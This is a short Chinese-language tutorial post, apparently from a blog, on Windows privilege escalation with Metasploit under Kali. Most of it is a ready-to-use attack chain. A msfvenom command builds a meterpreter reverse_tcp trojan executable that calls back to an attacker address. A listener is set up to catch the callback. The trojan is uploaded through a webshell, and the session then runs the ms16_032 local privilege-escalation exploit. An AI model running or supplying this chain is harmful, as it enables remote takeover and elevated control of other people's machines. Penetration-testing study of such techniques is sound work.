kali下msf提權
阿新 • • 發佈:2018-12-11
- 生成木馬
Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe
- 配置監聽程式
Msfconsole 開啟Metaploit
msf > use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.184.132
Exploit
現在將1.exe 通過菜刀或者webshell 上次到可寫目錄,並且執行
這樣就監聽成功了 獲得一個session (會話)
Getuid 檢視主機名
shell 進入命令列模式
當然這裡也可以載入exp
Exit 返回到meterpeter模式
Background 返回 multi/handler
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 載入exp
Session 1 返回之前的會話
Exploit 進行提權
這說明exp執行成功,可以進一步提權,內網滲透了